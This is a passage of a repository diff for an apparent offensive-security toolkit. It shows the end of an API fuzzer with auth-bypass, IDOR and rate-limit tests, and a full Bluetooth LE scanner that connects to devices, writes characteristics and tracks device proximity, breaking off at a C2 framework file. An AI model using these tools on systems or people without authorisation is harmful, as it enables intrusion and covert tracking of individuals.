rate_limited = any(r.get('status') == 429 for r in results)
|
||||
elapsed = time.time() - start_time
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'rate_limited': rate_limited,
|
||||
'total_requests': len(results),
|
||||
'elapsed_seconds': round(elapsed, 2),
|
||||
'rps': round(len(results) / elapsed, 1) if elapsed > 0 else 0,
|
||||
'limit_hit_at': next((r['request_num'] for r in results if r.get('status') == 429), None),
|
||||
'results': results
|
||||
}
|
||||
|
||||
# ── GraphQL ──────────────────────────────────────────────────────────
|
||||
|
||||
def graphql_introspect(self, url: str) -> Dict:
|
||||
"""Run GraphQL introspection query."""
|
||||
query = {
|
||||
'query': '''
|
||||
{
|
||||
__schema {
|
||||
types {
|
||||
name
|
||||
kind
|
||||
fields {
|
||||
name
|
||||
type { name kind }
|
||||
args { name type { name } }
|
||||
}
|
||||
}
|
||||
queryType { name }
|
||||
mutationType { name }
|
||||
}
|
||||
}
|
||||
'''
|
||||
}
|
||||
|
||||
try:
|
||||
resp = self.session.post(url, json=query, timeout=15)
|
||||
data = resp.json()
|
||||
|
||||
if 'errors' in data and not data.get('data'):
|
||||
return {'ok': False, 'error': 'Introspection disabled or error',
|
||||
'errors': data['errors']}
|
||||
|
||||
schema = data.get('data', {}).get('__schema', {})
|
||||
types = []
|
||||
for t in schema.get('types', []):
|
||||
if not t['name'].startswith('__'):
|
||||
types.append({
|
||||
'name': t['name'],
|
||||
'kind': t['kind'],
|
||||
'fields': [
|
||||
{'name': f['name'],
|
||||
'type': f['type'].get('name', f['type'].get('kind', '')),
|
||||
'args': [a['name'] for a in f.get('args', [])]}
|
||||
for f in (t.get('fields') or [])
|
||||
]
|
||||
})
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'query_type': schema.get('queryType', {}).get('name'),
|
||||
'mutation_type': schema.get('mutationType', {}).get('name'),
|
||||
'types': types,
|
||||
'type_count': len(types)
|
||||
}
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
def graphql_depth_test(self, url: str, max_depth: int = 10) -> Dict:
|
||||
"""Test GraphQL query depth limits."""
|
||||
results = []
|
||||
for depth in range(1, max_depth + 1):
|
||||
# Build nested query
|
||||
inner = '{ __typename }'
|
||||
for _ in range(depth):
|
||||
inner = f'{{ __schema {{ types {inner} }} }}'
|
||||
|
||||
try:
|
||||
resp = self.session.post(url, json={'query': inner}, timeout=10)
|
||||
results.append({
|
||||
'depth': depth,
|
||||
'status': resp.status_code,
|
||||
'has_errors': 'errors' in resp.json() if resp.headers.get('content-type', '').startswith('application/json') else None
|
||||
})
|
||||
if resp.status_code != 200:
|
||||
break
|
||||
except Exception:
|
||||
results.append({'depth': depth, 'error': True})
|
||||
break
|
||||
|
||||
max_allowed = max((r['depth'] for r in results if r.get('status') == 200), default=0)
|
||||
return {
|
||||
'ok': True,
|
||||
'max_depth_allowed': max_allowed,
|
||||
'depth_limited': max_allowed < max_depth,
|
||||
'results': results
|
||||
}
|
||||
|
||||
# ── Response Analysis ────────────────────────────────────────────────
|
||||
|
||||
def analyze_response(self, url: str, method: str = 'GET') -> Dict:
|
||||
"""Analyze API response for security issues."""
|
||||
try:
|
||||
resp = self.session.request(method, url, timeout=10)
|
||||
issues = []
|
||||
|
||||
# Check security headers
|
||||
security_headers = {
|
||||
'X-Content-Type-Options': 'nosniff',
|
||||
'X-Frame-Options': 'DENY|SAMEORIGIN',
|
||||
'Strict-Transport-Security': None,
|
||||
'Content-Security-Policy': None,
|
||||
'X-XSS-Protection': None,
|
||||
}
|
||||
for header, expected in security_headers.items():
|
||||
val = resp.headers.get(header)
|
||||
if not val:
|
||||
issues.append({
|
||||
'type': 'missing_header',
|
||||
'header': header,
|
||||
'severity': 'low'
|
||||
})
|
||||
|
||||
# Check for info disclosure
|
||||
server = resp.headers.get('Server', '')
|
||||
if server and any(v in server.lower() for v in ['apache/', 'nginx/', 'iis/']):
|
||||
issues.append({
|
||||
'type': 'server_disclosure',
|
||||
'value': server,
|
||||
'severity': 'info'
|
||||
})
|
||||
|
||||
powered_by = resp.headers.get('X-Powered-By', '')
|
||||
if powered_by:
|
||||
issues.append({
|
||||
'type': 'technology_disclosure',
|
||||
'value': powered_by,
|
||||
'severity': 'low'
|
||||
})
|
||||
|
||||
# Check CORS
|
||||
cors = resp.headers.get('Access-Control-Allow-Origin', '')
|
||||
if cors == '*':
|
||||
issues.append({
|
||||
'type': 'open_cors',
|
||||
'value': cors,
|
||||
'severity': 'medium'
|
||||
})
|
||||
|
||||
# Check for error/debug info in body
|
||||
body = resp.text.lower()
|
||||
if any(kw in body for kw in ['stack trace', 'traceback', 'debug mode']):
|
||||
issues.append({
|
||||
'type': 'debug_info',
|
||||
'severity': 'medium',
|
||||
'detail': 'Debug/stack trace information in response'
|
||||
})
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'url': url,
|
||||
'status': resp.status_code,
|
||||
'headers': dict(resp.headers),
|
||||
'issues': issues,
|
||||
'issue_count': len(issues)
|
||||
}
|
||||
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
# ── Job Management ───────────────────────────────────────────────────
|
||||
|
||||
def get_job(self, job_id: str) -> Optional[Dict]:
|
||||
return self._jobs.get(job_id)
|
||||
|
||||
def list_jobs(self) -> List[Dict]:
|
||||
return [{'id': k, **v} for k, v in self._jobs.items()]
|
||||
|
||||
|
||||
# ── Singleton ────────────────────────────────────────────────────────────────
|
||||
|
||||
_instance = None
|
||||
|
||||
def get_api_fuzzer() -> APIFuzzer:
|
||||
global _instance
|
||||
if _instance is None:
|
||||
_instance = APIFuzzer()
|
||||
return _instance
|
||||
|
||||
|
||||
# ── CLI Interface ────────────────────────────────────────────────────────────
|
||||
|
||||
def run():
|
||||
"""CLI entry point for API Fuzzer module."""
|
||||
if not HAS_REQUESTS:
|
||||
print(" Error: requests library not installed")
|
||||
return
|
||||
|
||||
fuzzer = get_api_fuzzer()
|
||||
|
||||
while True:
|
||||
print(f"\n{'='*60}")
|
||||
print(f" API Fuzzer")
|
||||
print(f"{'='*60}")
|
||||
print()
|
||||
print(" 1 — Discover Endpoints")
|
||||
print(" 2 — Parse OpenAPI Spec")
|
||||
print(" 3 — Fuzz Parameters")
|
||||
print(" 4 — Test Auth Bypass")
|
||||
print(" 5 — Test IDOR")
|
||||
print(" 6 — Test Rate Limiting")
|
||||
print(" 7 — GraphQL Introspection")
|
||||
print(" 8 — Analyze Response")
|
||||
print(" 9 — Set Authentication")
|
||||
print(" 0 — Back")
|
||||
print()
|
||||
|
||||
choice = input(" > ").strip()
|
||||
|
||||
if choice == '0':
|
||||
break
|
||||
elif choice == '1':
|
||||
base = input(" Base URL: ").strip()
|
||||
if base:
|
||||
job_id = fuzzer.discover_endpoints(base)
|
||||
print(f" Discovery started (job: {job_id})")
|
||||
while True:
|
||||
job = fuzzer.get_job(job_id)
|
||||
if job['status'] == 'complete':
|
||||
print(f" Found {len(job['found'])} endpoints:")
|
||||
for ep in job['found']:
|
||||
print(f" [{ep['status']}] {ep['path']} "
|
||||
f"({ep['content_type'][:30]})")
|
||||
break
|
||||
print(f" Checking... {job['checked']}/{job['total']}")
|
||||
time.sleep(1)
|
||||
elif choice == '2':
|
||||
url = input(" OpenAPI spec URL or file: ").strip()
|
||||
if url:
|
||||
result = fuzzer.parse_openapi(url)
|
||||
if result['ok']:
|
||||
print(f" API: {result['title']} v{result['version']}")
|
||||
print(f" Endpoints: {result['count']}")
|
||||
for ep in result['endpoints'][:20]:
|
||||
print(f" {ep['method']:<6} {ep['path']} {ep.get('summary', '')}")
|
||||
else:
|
||||
print(f" Error: {result['error']}")
|
||||
elif choice == '3':
|
||||
url = input(" Endpoint URL: ").strip()
|
||||
param_str = input(" Parameters (key=val,key=val): ").strip()
|
||||
ptype = input(" Payload type (sqli/xss/traversal/type_confusion): ").strip() or 'type_confusion'
|
||||
if url and param_str:
|
||||
params = dict(p.split('=', 1) for p in param_str.split(',') if '=' in p)
|
||||
result = fuzzer.fuzz_params(url, params=params, payload_type=ptype)
|
||||
if result['ok']:
|
||||
print(f" Tested {result['tested']} combinations, {len(result['findings'])} findings:")
|
||||
for f in result['findings']:
|
||||
print(f" [{f.get('severity', '?')}] {f['type']}: {f['param']} = {f['payload'][:50]}")
|
||||
elif choice == '4':
|
||||
url = input(" Protected URL: ").strip()
|
||||
if url:
|
||||
result = fuzzer.test_auth_bypass(url)
|
||||
print(f" Tested {len(result['bypasses'])} techniques, {result['successful']} successful")
|
||||
for b in result['bypasses']:
|
||||
status = 'BYPASSED' if b['success'] else f'blocked ({b["status"]})'
|
||||
print(f" {b['technique']}: {status}")
|
||||
elif choice == '6':
|
||||
url = input(" URL to test: ").strip()
|
||||
count = input(" Request count (default 50): ").strip()
|
||||
if url:
|
||||
result = fuzzer.test_rate_limit(url, int(count) if count.isdigit() else 50)
|
||||
print(f" Rate limited: {result['rate_limited']}")
|
||||
print(f" RPS: {result['rps']} | Total: {result['total_requests']} in {result['elapsed_seconds']}s")
|
||||
if result['limit_hit_at']:
|
||||
print(f" Limit hit at request #{result['limit_hit_at']}")
|
||||
elif choice == '7':
|
||||
url = input(" GraphQL URL: ").strip()
|
||||
if url:
|
||||
result = fuzzer.graphql_introspect(url)
|
||||
if result['ok']:
|
||||
print(f" Found {result['type_count']} types")
|
||||
for t in result['types'][:10]:
|
||||
print(f" {t['kind']}: {t['name']} ({len(t['fields'])} fields)")
|
||||
else:
|
||||
print(f" Error: {result['error']}")
|
||||
elif choice == '8':
|
||||
url = input(" URL: ").strip()
|
||||
if url:
|
||||
result = fuzzer.analyze_response(url)
|
||||
if result['ok']:
|
||||
print(f" Status: {result['status']} | Issues: {result['issue_count']}")
|
||||
for issue in result['issues']:
|
||||
print(f" [{issue['severity']}] {issue['type']}: {issue.get('value', issue.get('detail', ''))}")
|
||||
elif choice == '9':
|
||||
auth_type = input(" Auth type (bearer/api_key/basic/cookie): ").strip()
|
||||
value = input(" Value: ").strip()
|
||||
if auth_type and value:
|
||||
fuzzer.set_auth(auth_type, value)
|
||||
print(" Authentication configured")
|
||||
555
modules/ble_scanner.py
Normal file
555
modules/ble_scanner.py
Normal file
@ -0,0 +1,555 @@
|
||||
"""AUTARCH BLE Scanner
|
||||
|
||||
Bluetooth Low Energy device discovery, service enumeration, characteristic
|
||||
read/write, vulnerability scanning, and proximity tracking.
|
||||
"""
|
||||
|
||||
DESCRIPTION = "BLE device scanning & security analysis"
|
||||
AUTHOR = "darkHal"
|
||||
VERSION = "1.0"
|
||||
CATEGORY = "analyze"
|
||||
|
||||
import os
|
||||
import re
|
||||
import json
|
||||
import time
|
||||
import threading
|
||||
from pathlib import Path
|
||||
from datetime import datetime, timezone
|
||||
from typing import Dict, List, Optional, Any
|
||||
|
||||
try:
|
||||
from core.paths import get_data_dir
|
||||
except ImportError:
|
||||
def get_data_dir():
|
||||
return str(Path(__file__).parent.parent / 'data')
|
||||
|
||||
# Optional BLE library
|
||||
try:
|
||||
import asyncio
|
||||
from bleak import BleakScanner, BleakClient
|
||||
HAS_BLEAK = True
|
||||
except ImportError:
|
||||
HAS_BLEAK = False
|
||||
|
||||
|
||||
# ── Known Service UUIDs ──────────────────────────────────────────────────────
|
||||
|
||||
KNOWN_SERVICES = {
|
||||
'00001800-0000-1000-8000-00805f9b34fb': 'Generic Access',
|
||||
'00001801-0000-1000-8000-00805f9b34fb': 'Generic Attribute',
|
||||
'0000180a-0000-1000-8000-00805f9b34fb': 'Device Information',
|
||||
'0000180f-0000-1000-8000-00805f9b34fb': 'Battery Service',
|
||||
'00001812-0000-1000-8000-00805f9b34fb': 'Human Interface Device',
|
||||
'0000180d-0000-1000-8000-00805f9b34fb': 'Heart Rate',
|
||||
'00001809-0000-1000-8000-00805f9b34fb': 'Health Thermometer',
|
||||
'00001802-0000-1000-8000-00805f9b34fb': 'Immediate Alert',
|
||||
'00001803-0000-1000-8000-00805f9b34fb': 'Link Loss',
|
||||
'00001804-0000-1000-8000-00805f9b34fb': 'Tx Power',
|
||||
'00001805-0000-1000-8000-00805f9b34fb': 'Current Time',
|
||||
'00001808-0000-1000-8000-00805f9b34fb': 'Glucose',
|
||||
'00001810-0000-1000-8000-00805f9b34fb': 'Blood Pressure',
|
||||
'00001813-0000-1000-8000-00805f9b34fb': 'Scan Parameters',
|
||||
'00001816-0000-1000-8000-00805f9b34fb': 'Cycling Speed & Cadence',
|
||||
'00001818-0000-1000-8000-00805f9b34fb': 'Cycling Power',
|
||||
'00001814-0000-1000-8000-00805f9b34fb': 'Running Speed & Cadence',
|
||||
'0000fee0-0000-1000-8000-00805f9b34fb': 'Mi Band Service',
|
||||
'0000feaa-0000-1000-8000-00805f9b34fb': 'Eddystone (Google)',
|
||||
}
|
||||
|
||||
MANUFACTURER_IDS = {
|
||||
0x004C: 'Apple',
|
||||
0x0006: 'Microsoft',
|
||||
0x000F: 'Texas Instruments',
|
||||
0x0059: 'Nordic Semiconductor',
|
||||
0x0075: 'Samsung',
|
||||
0x00E0: 'Google',
|
||||
0x0157: 'Xiaomi',
|
||||
0x0171: 'Amazon',
|
||||
0x02FF: 'Huawei',
|
||||
0x0310: 'Fitbit',
|
||||
}
|
||||
|
||||
KNOWN_VULNS = {
|
||||
'KNOB': {
|
||||
'description': 'Key Negotiation of Bluetooth Attack — downgrades encryption key entropy',
|
||||
'cve': 'CVE-2019-9506',
|
||||
'severity': 'high',
|
||||
'check': 'Requires active MITM during pairing'
|
||||
},
|
||||
'BLESA': {
|
||||
'description': 'BLE Spoofing Attack — reconnection spoofing without auth',
|
||||
'cve': 'CVE-2020-9770',
|
||||
'severity': 'medium',
|
||||
'check': 'Affects reconnection after disconnect'
|
||||
},
|
||||
'SweynTooth': {
|
||||
'description': 'Family of BLE implementation bugs causing crashes/deadlocks',
|
||||
'cve': 'Multiple (CVE-2019-16336, CVE-2019-17519, etc.)',
|
||||
'severity': 'high',
|
||||
'check': 'Vendor-specific, requires firmware version check'
|
||||
},
|
||||
'BlueBorne': {
|
||||
'description': 'Remote code execution via Bluetooth without pairing',
|
||||
'cve': 'CVE-2017-0781 to CVE-2017-0785',
|
||||
'severity': 'critical',
|
||||
'check': 'Requires classic BT stack, pre-2018 devices vulnerable'
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
# ── BLE Scanner ──────────────────────────────────────────────────────────────
|
||||
|
||||
class BLEScanner:
|
||||
"""Bluetooth Low Energy device scanner and analyzer."""
|
||||
|
||||
def __init__(self):
|
||||
self.data_dir = os.path.join(get_data_dir(), 'ble')
|
||||
os.makedirs(self.data_dir, exist_ok=True)
|
||||
self.devices: Dict[str, Dict] = {}
|
||||
self.tracking_history: Dict[str, List[Dict]] = {}
|
||||
self._scan_running = False
|
||||
|
||||
def is_available(self) -> bool:
|
||||
"""Check if BLE scanning is available."""
|
||||
return HAS_BLEAK
|
||||
|
||||
def get_status(self) -> Dict:
|
||||
"""Get scanner status."""
|
||||
return {
|
||||
'available': HAS_BLEAK,
|
||||
'devices_found': len(self.devices),
|
||||
'scanning': self._scan_running,
|
||||
'tracking': len(self.tracking_history)
|
||||
}
|
||||
|
||||
# ── Scanning ─────────────────────────────────────────────────────────
|
||||
|
||||
def scan(self, duration: float = 10.0) -> Dict:
|
||||
"""Scan for BLE devices."""
|
||||
if not HAS_BLEAK:
|
||||
return {'ok': False, 'error': 'bleak library not installed (pip install bleak)'}
|
||||
|
||||
self._scan_running = True
|
||||
|
||||
try:
|
||||
loop = asyncio.new_event_loop()
|
||||
devices = loop.run_until_complete(self._async_scan(duration))
|
||||
loop.close()
|
||||
|
||||
results = []
|
||||
for dev in devices:
|
||||
info = self._parse_device(dev)
|
||||
self.devices[info['address']] = info
|
||||
results.append(info)
|
||||
|
||||
self._scan_running = False
|
||||
return {
|
||||
'ok': True,
|
||||
'devices': results,
|
||||
'count': len(results),
|
||||
'duration': duration
|
||||
}
|
||||
|
||||
except Exception as e:
|
||||
self._scan_running = False
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
async def _async_scan(self, duration: float):
|
||||
"""Async BLE scan."""
|
||||
devices = await BleakScanner.discover(timeout=duration, return_adv=True)
|
||||
return devices
|
||||
|
||||
def _parse_device(self, dev_adv) -> Dict:
|
||||
"""Parse BLE device advertisement data."""
|
||||
if isinstance(dev_adv, tuple):
|
||||
dev, adv = dev_adv
|
||||
else:
|
||||
dev = dev_adv
|
||||
adv = None
|
||||
|
||||
info = {
|
||||
'address': str(dev.address) if hasattr(dev, 'address') else str(dev),
|
||||
'name': dev.name if hasattr(dev, 'name') else 'Unknown',
|
||||
'rssi': dev.rssi if hasattr(dev, 'rssi') else (adv.rssi if adv and hasattr(adv, 'rssi') else 0),
|
||||
'services': [],
|
||||
'manufacturer': 'Unknown',
|
||||
'device_type': 'unknown',
|
||||
'connectable': True,
|
||||
'last_seen': datetime.now(timezone.utc).isoformat(),
|
||||
}
|
||||
|
||||
# Parse advertisement data
|
||||
if adv:
|
||||
# Service UUIDs
|
||||
if hasattr(adv, 'service_uuids'):
|
||||
for uuid in adv.service_uuids:
|
||||
service_name = KNOWN_SERVICES.get(uuid.lower(), uuid)
|
||||
info['services'].append({'uuid': uuid, 'name': service_name})
|
||||
|
||||
# Manufacturer data
|
||||
if hasattr(adv, 'manufacturer_data'):
|
||||
for company_id, data in adv.manufacturer_data.items():
|
||||
info['manufacturer'] = MANUFACTURER_IDS.get(company_id, f'ID: {company_id:#06x}')
|
||||
info['manufacturer_data'] = data.hex() if isinstance(data, bytes) else str(data)
|
||||
|
||||
# TX Power
|
||||
if hasattr(adv, 'tx_power'):
|
||||
info['tx_power'] = adv.tx_power
|
||||
|
||||
# Classify device type
|
||||
info['device_type'] = self._classify_device(info)
|
||||
|
||||
return info
|
||||
|
||||
def _classify_device(self, info: Dict) -> str:
|
||||
"""Classify device type from services and name."""
|
||||
name = (info.get('name') or '').lower()
|
||||
services = [s['uuid'].lower() for s in info.get('services', [])]
|
||||
|
||||
if any('1812' in s for s in services):
|
||||
return 'hid' # keyboard/mouse
|
||||
if any('180d' in s for s in services):
|
||||
return 'fitness'
|
||||
if any('180f' in s for s in services):
|
||||
if 'headphone' in name or 'airpod' in name or 'buds' in name:
|
||||
return 'audio'
|
||||
if any('fee0' in s for s in services):
|
||||
return 'wearable'
|
||||
if info.get('manufacturer') == 'Apple':
|
||||
if 'watch' in name:
|
||||
return 'wearable'
|
||||
if 'airpod' in name:
|
||||
return 'audio'
|
||||
return 'apple_device'
|
||||
if 'tv' in name or 'chromecast' in name or 'roku' in name:
|
||||
return 'media'
|
||||
if 'lock' in name or 'door' in name:
|
||||
return 'smart_lock'
|
||||
if 'light' in name or 'bulb' in name or 'hue' in name:
|
||||
return 'smart_light'
|
||||
if 'beacon' in name or any('feaa' in s for s in services):
|
||||
return 'beacon'
|
||||
if 'tile' in name or 'airtag' in name or 'tracker' in name:
|
||||
return 'tracker'
|
||||
return 'unknown'
|
||||
|
||||
# ── Device Detail ────────────────────────────────────────────────────
|
||||
|
||||
def get_device_detail(self, address: str) -> Dict:
|
||||
"""Connect to device and enumerate services/characteristics."""
|
||||
if not HAS_BLEAK:
|
||||
return {'ok': False, 'error': 'bleak not installed'}
|
||||
|
||||
try:
|
||||
loop = asyncio.new_event_loop()
|
||||
result = loop.run_until_complete(self._async_detail(address))
|
||||
loop.close()
|
||||
return result
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
async def _async_detail(self, address: str) -> Dict:
|
||||
"""Async device detail enumeration."""
|
||||
async with BleakClient(address) as client:
|
||||
services = []
|
||||
for service in client.services:
|
||||
svc = {
|
||||
'uuid': service.uuid,
|
||||
'name': KNOWN_SERVICES.get(service.uuid.lower(), service.description or service.uuid),
|
||||
'characteristics': []
|
||||
}
|
||||
for char in service.characteristics:
|
||||
ch = {
|
||||
'uuid': char.uuid,
|
||||
'description': char.description or char.uuid,
|
||||
'properties': char.properties,
|
||||
'value': None
|
||||
}
|
||||
# Try to read if readable
|
||||
if 'read' in char.properties:
|
||||
try:
|
||||
val = await client.read_gatt_char(char.uuid)
|
||||
ch['value'] = val.hex() if isinstance(val, bytes) else str(val)
|
||||
# Try UTF-8 decode
|
||||
try:
|
||||
ch['value_text'] = val.decode('utf-8')
|
||||
except (UnicodeDecodeError, AttributeError):
|
||||
pass
|
||||
except Exception:
|
||||
ch['value'] = '<read failed>'
|
||||
|
||||
svc['characteristics'].append(ch)
|
||||
services.append(svc)
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'address': address,
|
||||
'connected': True,
|
||||
'services': services,
|
||||
'service_count': len(services),
|
||||
'char_count': sum(len(s['characteristics']) for s in services)
|
||||
}
|
||||
|
||||
def read_characteristic(self, address: str, char_uuid: str) -> Dict:
|
||||
"""Read a specific characteristic value."""
|
||||
if not HAS_BLEAK:
|
||||
return {'ok': False, 'error': 'bleak not installed'}
|
||||
|
||||
try:
|
||||
loop = asyncio.new_event_loop()
|
||||
result = loop.run_until_complete(self._async_read(address, char_uuid))
|
||||
loop.close()
|
||||
return result
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
async def _async_read(self, address: str, char_uuid: str) -> Dict:
|
||||
async with BleakClient(address) as client:
|
||||
val = await client.read_gatt_char(char_uuid)
|
||||
return {
|
||||
'ok': True,
|
||||
'address': address,
|
||||
'characteristic': char_uuid,
|
||||
'value_hex': val.hex(),
|
||||
'value_bytes': list(val),
|
||||
'size': len(val)
|
||||
}
|
||||
|
||||
def write_characteristic(self, address: str, char_uuid: str,
|
||||
data: bytes) -> Dict:
|
||||
"""Write to a characteristic."""
|
||||
if not HAS_BLEAK:
|
||||
return {'ok': False, 'error': 'bleak not installed'}
|
||||
|
||||
try:
|
||||
loop = asyncio.new_event_loop()
|
||||
result = loop.run_until_complete(self._async_write(address, char_uuid, data))
|
||||
loop.close()
|
||||
return result
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
async def _async_write(self, address: str, char_uuid: str, data: bytes) -> Dict:
|
||||
async with BleakClient(address) as client:
|
||||
await client.write_gatt_char(char_uuid, data)
|
||||
return {'ok': True, 'address': address, 'characteristic': char_uuid,
|
||||
'written': len(data)}
|
||||
|
||||
# ── Vulnerability Scanning ───────────────────────────────────────────
|
||||
|
||||
def vuln_scan(self, address: str = None) -> Dict:
|
||||
"""Check for known BLE vulnerabilities."""
|
||||
vulns = []
|
||||
|
||||
for vuln_name, vuln_info in KNOWN_VULNS.items():
|
||||
entry = {
|
||||
'name': vuln_name,
|
||||
'description': vuln_info['description'],
|
||||
'cve': vuln_info['cve'],
|
||||
'severity': vuln_info['severity'],
|
||||
'status': 'check_required',
|
||||
'note': vuln_info['check']
|
||||
}
|
||||
vulns.append(entry)
|
||||
|
||||
# Device-specific checks
|
||||
if address and address in self.devices:
|
||||
dev = self.devices[address]
|
||||
manufacturer = dev.get('manufacturer', '')
|
||||
|
||||
# Apple devices with older firmware
|
||||
if manufacturer == 'Apple':
|
||||
vulns.append({
|
||||
'name': 'Apple BLE Tracking',
|
||||
'description': 'Apple devices broadcast continuity messages that can be tracked',
|
||||
'severity': 'info',
|
||||
'status': 'detected' if 'apple_device' in dev.get('device_type', '') else 'not_applicable',
|
||||
'note': 'Apple continuity protocol leaks device info'
|
||||
})
|
||||
|
||||
# Devices without encryption
|
||||
for svc in dev.get('services', []):
|
||||
if 'immediate alert' in svc.get('name', '').lower():
|
||||
vulns.append({
|
||||
'name': 'Unauthenticated Alert Service',
|
||||
'description': 'Immediate Alert service accessible without pairing',
|
||||
'severity': 'low',
|
||||
'status': 'detected',
|
||||
'note': 'Can trigger alerts on device without authentication'
|
||||
})
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'address': address,
|
||||
'vulnerabilities': vulns,
|
||||
'vuln_count': len(vulns)
|
||||
}
|
||||
|
||||
# ── Proximity Tracking ───────────────────────────────────────────────
|
||||
|
||||
def track_device(self, address: str) -> Dict:
|
||||
"""Record RSSI for proximity tracking."""
|
||||
if address not in self.devices:
|
||||
return {'ok': False, 'error': 'Device not found. Run scan first.'}
|
||||
|
||||
dev = self.devices[address]
|
||||
rssi = dev.get('rssi', 0)
|
||||
tx_power = dev.get('tx_power', -59) # default TX power
|
||||
|
||||
# Estimate distance (rough path-loss model)
|
||||
if rssi != 0:
|
||||
ratio = rssi / tx_power
|
||||
if ratio < 1.0:
|
||||
distance = pow(ratio, 10)
|
||||
else:
|
||||
distance = 0.89976 * pow(ratio, 7.7095) + 0.111
|
||||
else:
|
||||
distance = -1
|
||||
|
||||
entry = {
|
||||
'timestamp': datetime.now(timezone.utc).isoformat(),
|
||||
'rssi': rssi,
|
||||
'estimated_distance_m': round(distance, 2),
|
||||
'tx_power': tx_power
|
||||
}
|
||||
|
||||
if address not in self.tracking_history:
|
||||
self.tracking_history[address] = []
|
||||
self.tracking_history[address].append(entry)
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'address': address,
|
||||
'name': dev.get('name', 'Unknown'),
|
||||
'current': entry,
|
||||
'history_count': len(self.tracking_history[address])
|
||||
}
|
||||
|
||||
def get_tracking_history(self, address: str) -> List[Dict]:
|
||||
"""Get tracking history for a device."""
|
||||
return self.tracking_history.get(address, [])
|
||||
|
||||
# ── Persistence ──────────────────────────────────────────────────────
|
||||
|
||||
def save_scan(self, name: str = None) -> Dict:
|
||||
"""Save current scan results."""
|
||||
name = name or f'scan_{int(time.time())}'
|
||||
filepath = os.path.join(self.data_dir, f'{name}.json')
|
||||
with open(filepath, 'w') as f:
|
||||
json.dump({
|
||||
'timestamp': datetime.now(timezone.utc).isoformat(),
|
||||
'devices': list(self.devices.values()),
|
||||
'count': len(self.devices)
|
||||
}, f, indent=2)
|
||||
return {'ok': True, 'path': filepath, 'count': len(self.devices)}
|
||||
|
||||
def list_scans(self) -> List[Dict]:
|
||||
"""List saved scans."""
|
||||
scans = []
|
||||
for f in Path(self.data_dir).glob('*.json'):
|
||||
try:
|
||||
with open(f) as fh:
|
||||
data = json.load(fh)
|
||||
scans.append({
|
||||
'name': f.stem,
|
||||
'path': str(f),
|
||||
'timestamp': data.get('timestamp', ''),
|
||||
'count': data.get('count', 0)
|
||||
})
|
||||
except Exception:
|
||||
pass
|
||||
return scans
|
||||
|
||||
def get_devices(self) -> List[Dict]:
|
||||
"""Get all discovered devices."""
|
||||
return list(self.devices.values())
|
||||
|
||||
|
||||
# ── Singleton ────────────────────────────────────────────────────────────────
|
||||
|
||||
_instance = None
|
||||
|
||||
def get_ble_scanner() -> BLEScanner:
|
||||
global _instance
|
||||
if _instance is None:
|
||||
_instance = BLEScanner()
|
||||
return _instance
|
||||
|
||||
|
||||
# ── CLI Interface ────────────────────────────────────────────────────────────
|
||||
|
||||
def run():
|
||||
"""CLI entry point for BLE Scanner module."""
|
||||
scanner = get_ble_scanner()
|
||||
|
||||
while True:
|
||||
status = scanner.get_status()
|
||||
print(f"\n{'='*60}")
|
||||
print(f" BLE Scanner (bleak: {'OK' if status['available'] else 'MISSING'})")
|
||||
print(f"{'='*60}")
|
||||
print(f" Devices found: {status['devices_found']}")
|
||||
print()
|
||||
print(" 1 — Scan for Devices")
|
||||
print(" 2 — View Devices")
|
||||
print(" 3 — Device Detail (connect)")
|
||||
print(" 4 — Vulnerability Scan")
|
||||
print(" 5 — Track Device (proximity)")
|
||||
print(" 6 — Save Scan")
|
||||
print(" 7 — List Saved Scans")
|
||||
print(" 0 — Back")
|
||||
print()
|
||||
|
||||
choice = input(" > ").strip()
|
||||
|
||||
if choice == '0':
|
||||
break
|
||||
elif choice == '1':
|
||||
dur = input(" Scan duration (seconds, default 10): ").strip()
|
||||
result = scanner.scan(float(dur) if dur else 10.0)
|
||||
if result['ok']:
|
||||
print(f" Found {result['count']} devices:")
|
||||
for dev in result['devices']:
|
||||
print(f" {dev['address']} {dev.get('name', '?'):<20} "
|
||||
f"RSSI={dev['rssi']} {dev['device_type']} ({dev['manufacturer']})")
|
||||
else:
|
||||
print(f" Error: {result['error']}")
|
||||
elif choice == '2':
|
||||
devices = scanner.get_devices()
|
||||
for dev in devices:
|
||||
print(f" {dev['address']} {dev.get('name', '?'):<20} "
|
||||
f"RSSI={dev['rssi']} {dev['device_type']}")
|
||||
elif choice == '3':
|
||||
addr = input(" Device address: ").strip()
|
||||
if addr:
|
||||
result = scanner.get_device_detail(addr)
|
||||
if result['ok']:
|
||||
print(f" Services: {result['service_count']} Characteristics: {result['char_count']}")
|
||||
for svc in result['services']:
|
||||
print(f" [{svc['name']}]")
|
||||
for ch in svc['characteristics']:
|
||||
val = ch.get('value_text', ch.get('value', ''))
|
||||
print(f" {ch['description']} props={ch['properties']} val={val}")
|
||||
else:
|
||||
print(f" Error: {result['error']}")
|
||||
elif choice == '4':
|
||||
addr = input(" Device address (blank=general): ").strip() or None
|
||||
result = scanner.vuln_scan(addr)
|
||||
for v in result['vulnerabilities']:
|
||||
print(f" [{v['severity']:<8}] {v['name']}: {v['description'][:60]}")
|
||||
elif choice == '5':
|
||||
addr = input(" Device address: ").strip()
|
||||
if addr:
|
||||
result = scanner.track_device(addr)
|
||||
if result['ok']:
|
||||
c = result['current']
|
||||
print(f" RSSI: {c['rssi']} Distance: ~{c['estimated_distance_m']}m")
|
||||
else:
|
||||
print(f" Error: {result['error']}")
|
||||
elif choice == '6':
|
||||
name = input(" Scan name (blank=auto): ").strip() or None
|
||||
result = scanner.save_scan(name)
|
||||
print(f" Saved {result['count']} devices")
|
||||
elif choice == '7':
|
||||
for s in scanner.list_scans():
|
||||
print(f" {s['name']} ({s['count']} devices) {s['timestamp']}")
|
||||
610
modules/c2_framework.py
Normal file
610
